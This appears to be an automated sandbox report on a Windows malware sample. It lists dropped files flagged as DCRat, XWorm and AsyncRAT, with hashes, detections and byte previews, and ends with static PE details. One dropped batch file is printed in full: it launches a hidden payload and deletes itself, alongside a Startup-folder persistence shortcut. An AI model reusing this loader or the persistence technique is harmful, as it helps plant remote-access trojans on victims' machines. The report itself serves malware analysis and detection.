                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cmd.exe.log

                                    Download File
                                    Process:C:\Users\user\cmd.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\cougif6lqM.exe.log

                                    Download File
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1088
                                    Entropy (8bit):5.389928136181357
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6Kh6+84xp3/Vcll1qE4GIs0E4KD:MxHKQwYHKGSI6o6+vxp3/ell1qHGIs0K
                                    MD5:7F03B15120D277413D7C08047184C8F5
                                    SHA1:0A6EEC1B9E6BB8FF846D21F7575E78B29C42A00F
                                    SHA-256:18E01DE8BB5C3C111EA89C01A4D28F1834BB02E26C0ECD86D8CCAB3835C79B2C
                                    SHA-512:8995C0BEA34B69FFEEE03FBB332223AB95502938A4789E64CBE8329F596E43C74676FF4550AD4F8506AAF6B955E6F8A5BDEAF1A5B6D71275D265DCE2D5478754
                                    Malicious:true
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_6

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe.log

                                    Download File
                                    Process:C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
                                    File Type:CSV text
                                    Category:dropped
                                    Size (bytes):1281
                                    Entropy (8bit):5.370111951859942
                                    Encrypted:false
                                    SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                                    MD5:12C61586CD59AA6F2A21DF30501F71BD
                                    SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                                    SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                                    SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\providerreviewdhcp.exe.log

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1830
                                    Entropy (8bit):5.3661116947161815
                                    Encrypted:false
                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
                                    MD5:FE86BB9E3E84E6086797C4D5A9C909F2
                                    SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
                                    SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
                                    SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
                                    Malicious:false
                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllulbnolz:NllUc
                                    MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                    SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                    SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                    SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                    Malicious:false
                                    Preview:@...e................................................@..........

                                    C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):225
                                    Entropy (8bit):5.259747938023626
                                    Encrypted:false
                                    SSDEEP:6:hITg3Nou11r+DE1WD5TcL+KBTuibfDA0SKOZG1qLTwi23f/h:OTg9YDEoTdKBTuivNswZx
                                    MD5:876CE5904FFB2069A04FA30DB6431AB9
                                    SHA1:A1DFC74A30922CAC4207A4977909FB6B01B2E28E
                                    SHA-256:991DE81AB902A85256ED98E1EBFF204DA30475FCD266D94502A2A9AE8A5E88DC
                                    SHA-512:BE66AF9371D453F3CB5EFA6FDCAEE2BDFA84F964BCFABC5867B5F8A34F1317A3D26451D6B3AD1AD756F4106DD81BBC30E005B7CF315B696F6C58D4127891B91C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\Default\PrintHood\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8o9UezPTg6.bat"

                                    C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):1588999
                                    Entropy (8bit):6.987851842831063
                                    Encrypted:false
                                    SSDEEP:49152:UbA30EhwsMc3xHulstzQkl2wRvJ21nnwY:UbAisMCYdkfRJ2RwY
                                    MD5:81A0B6CE5163BE692566FFA70F8E9839
                                    SHA1:342D49B98D08F79B5A41682231C79ED0E3403B5B
                                    SHA-256:86C4DB18169DD82595BA107500CC12EFAB51DE2F52B62168303ACF58C1A973A8
                                    SHA-512:C130051EE387BDFDDBB0F82D79847F188DD340C9B3A5D9D48BB8D02DAED743C5318DAFD3B8CEDB841CAB62EE9F27DF60EED6ED1A4DD8726AC433CD268653E69C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 70%
                                    • Antivirus: Virustotal, Detection: 59%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'...Rich&...................PE..L....._............................@........0....@..........................@............@......................... ...4...T...<....0..........................h"......T............................U..@............0..`...... ....................text............................... ..`.rdata.......0......................@..@.data...(7..........................@....didat....... ......................@....rsrc........0......................@..@.reloc..h".......$..................@..B........................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wgpfxad.alj.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5g4hzlx.adf.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kmtwu2nd.mxn.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xobuqxre.cok.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\javaclient.exe

                                    Download File
                                    Process:C:\Users\user\Desktop\cougif6lqM.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):151040
                                    Entropy (8bit):7.524350777165646
                                    Encrypted:false
                                    SSDEEP:3072:XzVO5Hwt4nbrdu6BgOOUb7JoWzHdcIpR49mp83n7Se/suQTvYag:XzVOBw+nbdJ7rzdcaomp8X7fs7vYa
                                    MD5:2F969595E0DD360ECD52126BF5ECE5E5
                                    SHA1:3560779C522DE4D8C411EEC8D9AEAE9E2EBCC259
                                    SHA-256:3C3A282F4B43F7B8409D4F4E566EE2FDA7D0EF6E60675CF43FA2896C81F5BD6C
                                    SHA-512:0553AD101B6A83DCE08D4D6EBD413FA0C19B2A7F3F67C54CB0FEC2EC820A52F9BC224A0EA958A0539542869433D2CA5404E6BC01278CDC7BD6903945C279A01F
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: Joe Security
                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\javaclient.exe, Author: ditekSHen
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 92%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................p......N.... ........@.. ....................................@.....................................K........m........................................................................... ............... ..H............text...T.... ...................... ..`.rsrc....m.......n..................@..@.reloc...............L..............@..B................0.......H.......0Y.........&.....................................................(....*.r...p*. J...*..(....*.rq..p*. ,-..*.s.........s.........s.........s.........*.r"..p*. S...*.r`..p*. .t..*.r...p*. /6..*.r...p*. /?..*.r...p*. &m..*..((...*.r2..p*. r.d.*.rp..p*. ...*&(....&+.*.+5sX... .... .'..oY...(*...~....-.(D...(6...~....oZ...&.-.*.rt..p*. ..i.*.r...p*. X...*.r...p*. *p{.*.r...p*. .'..*.rl..p*..............j..................s[..............*"(F...+.*:.t....(A...+.*.r...p*.

                                    C:\Users\user\AppData\Local\Temp\rQbUmvYmK7

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):25
                                    Entropy (8bit):4.243856189774723
                                    Encrypted:false
                                    SSDEEP:3:uEtF1wTi:uAui
                                    MD5:010C8C1B8C76C9CCC362580CF27864CD
                                    SHA1:21397C6D054E7D11DA05E8BD889ABB6964B9D88D
                                    SHA-256:02DE83B6B222977E3B42F09640F9854DCD1ABF0C2F5597A5E8ACB32D8F75E04C
                                    SHA-512:E29F82FD123ED16D9E3E28E9FF623133AC2BB3776E90F85F309BC2E21F9ECF3B2610213C93C1E8578D7084AD10A6B1E44392CEC877EB76B9A6CA18097B0743E2
                                    Malicious:false
                                    Preview:P7fUkZhoGGkmrN1Nvl3dPU6eb

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk

                                    Download File
                                    Process:C:\Users\user\AppData\Local\Temp\javaclient.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Aug 6 08:51:55 2024, mtime=Tue Aug 6 08:51:56 2024, atime=Tue Aug 6 08:51:55 2024, length=151040, window=hide
                                    Category:dropped
                                    Size (bytes):1068
                                    Entropy (8bit):4.999962112570021
                                    Encrypted:false
                                    SSDEEP:24:8PxfPHREgKGgXFAvwZCkR487PqwOqygm:8Px3HR2evwZCq48tLyg
                                    MD5:B3033D0D23BAC1D95B1A4388D7B5635F
                                    SHA1:DAB086EF127928D20C7BC22C7F113C4F658BC2F7
                                    SHA-256:2E400F0CFE4C0726829F1442499658312F6F38470E26943360DA3777A5988F7C
                                    SHA-512:BA3D5E02B4AC06C63A737403F530146F79E294055DB75A133030A8E395D258BB89FB586A353AC1B0530C4FD50D3624B764FDBC24A39C9BC18054D085190CBEE6
                                    Malicious:false
                                    Preview:L..................F.... ....f.E.......E.....f.E.....N........................:..DG..Yr?.D..U..k0.&...&.......bBDj....yoG....1.MP........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsG.YzN..........................=...A.p.p.D.a.t.a...B.P.1......YxN..Local.<......EWsG.YzN.........................=...L.o.c.a.l.....N.1......Y.N..Temp..:......EWsG.Y.N..........................z..T.e.m.p.....j.2..N...Y|N .JAVACL~1.EXE..N.......Y|N.Y|N....^.....................&_..j.a.v.a.c.l.i.e.n.t...e.x.e.......^...............-.......]...................C:\Users\user\AppData\Local\Temp\javaclient.exe..+.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.j.a.v.a.c.l.i.e.n.t...e.x.e.............:...........|....I.J.H..K..:...`.......X.......549163...........hT..CrF.f4... ...E._c...,...E...hT..CrF.f4... ...E._c...,...E..............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3......

                                    C:\Users\user\cmd.exe

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):1271808
                                    Entropy (8bit):6.974484340050101
                                    Encrypted:false
                                    SSDEEP:24576:whRV3k2rJm5LCipfsLZeXYzVt39upvFHmWeNxQklxwwRwiJ21nnw+:whwsMc3xHulstzQkl2wRvJ21nnw
                                    MD5:8F04E3EE4A119F4B39412E27CED12DE8
                                    SHA1:6E90446932E03216AFD391499D7407687E362FA9
                                    SHA-256:6B994DD60BF5C088925A2E28F6864ACDE54CA8B8CEA576470189D1B469A39FF7
                                    SHA-512:910F27017296DA9051E872D008CFFB5FCFD23CDA69BBA95E60FE94C34A4338B00462FA29C91C04B31E40448FE0B5F48E4C7A5BC2010167B75E086E88B4A40D6C
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: Avira, Detection: 100%
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    • Antivirus: ReversingLabs, Detection: 88%
                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6.......L... ...`....@.. ....................................@..................................K..K.................................................................................... ............... ..H............text...4,... ...................... ..`.sdata.../...`...0...2..............@....rsrc................b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\ebf1f9fa8afd6d

                                    Download File
                                    Process:C:\Componenthost\providerreviewdhcp.exe
                                    File Type:ASCII text, with very long lines (417), with no line terminators
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.847916816232214
                                    Encrypted:false
                                    SSDEEP:6:BGKuHT34EFZQSd04zJN+bHWRE+qmjqOOu48qpF2LjTMmGJoLoKzmQpPI6Tdt30C:B5ub4EFZQSd049NSLmjp0+gdKiE9z3J
                                    MD5:47B92548458745131A59A88C71504772
                                    SHA1:A2E22A136B8FA96857FC897A08A75C9F64E5607F
                                    SHA-256:18D7593AD477EF0458CE5D2475BC8998401E855C21E2420557614C8265F5DF86
                                    SHA-512:8F94932C6B061AB407698C646B5DF0B92FB15D15DD6B921CCFD99DF622DDF5286037F9A8156322FC394F46120D8517EAC4521EA49D81098D485B621BC4713301
                                    Malicious:false
                                    Preview:mTO7y9yVBz88PjEoKfQolAPV8Id6x847WlZI42CTjjU8Ko6w8m1M0NymD29pg1hC4AloK6uSd6EBpRLUMq7LHsHJwxEB3WxrCREJCRmC1js4Ix6wrpdz4W5L3c1W1tZGIX9YMBR4E5Ti9NA90RUO38xpV2QkaPKIJmvvyijpXiu9DXLqb2gjZLNKjTCUvrezuKYXbPLSso0UNxl7qkJhtkt8ZkLefP3qD5O29yOLrN1uU26vsEnLh6GJbZ81EqwcuJRSjs82V70fs8ogoZwamsIGyFbkzXHAbZAKknM9GuzkFladvbMo4V0CBKedRYD8z0ET8d5AMwU22hANo7zXKdGFj8JaJtssq1vPhGfRgMbHB8JdJQzUjqyWt8uAUf1dEmLBwvqhch18B8DkypR24YJACZfiWf6AV

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Entropy (8bit):7.996846244012986
                                    TrID:
                                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                    • Win32 Executable (generic) a (10002005/4) 49.78%
                                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                    • Generic Win/DOS Executable (2004/3) 0.01%
                                    • DOS Executable Generic (2002/1) 0.01%
                                    File name:cougif6lqM.exe
                                    File size:1'265'664 bytes
                                    MD5:2bbc8212c548dcb848224a882b32492a
                                    SHA1:d056d925ed8284c3b41e4bd2905e6e4cbbd56d3b
                                    SHA256:4b0446befa42f4a40fd06635aaa72fb34dfbaa7575fb1f811df6f4fad90f53b4
                                    SHA512:8340eaa4607b155b817481e6cc0211b37ee05b9cec90a9b577bfa93929496b203aed086235b2936fac5a3a21e0736711a5f39fe6e480243a0d738819b8e390ce
                                    SSDEEP:24576:VIY/wWfmHeEhb0z4iUiKKRHVtrbuvrFHUWiNVuGZxwiRQiJibnniokbiZpOUYa:VImmSzFJ1huTWv3uGZ2iRPJibnniopYa
                                    TLSH:904533D38C59859BFE1DBD304D4A315969E54DE80D88CFA89D4FAD098FFE8202A54F2C
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.....................p......^.... ........@.. ....................................@................................

                                    File Icon

                                    Icon Hash:176751b1b1546917

                                    Static PE Info

                                    General

                                    Entrypoint:0x51fd5e
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x66AD0DCE [Fri Aug 2 16:48:14 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                    Entrypoint Preview

                                    Instruction
                                    jmp dword ptr [00402000h]
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
                                    add byte ptr [eax], al
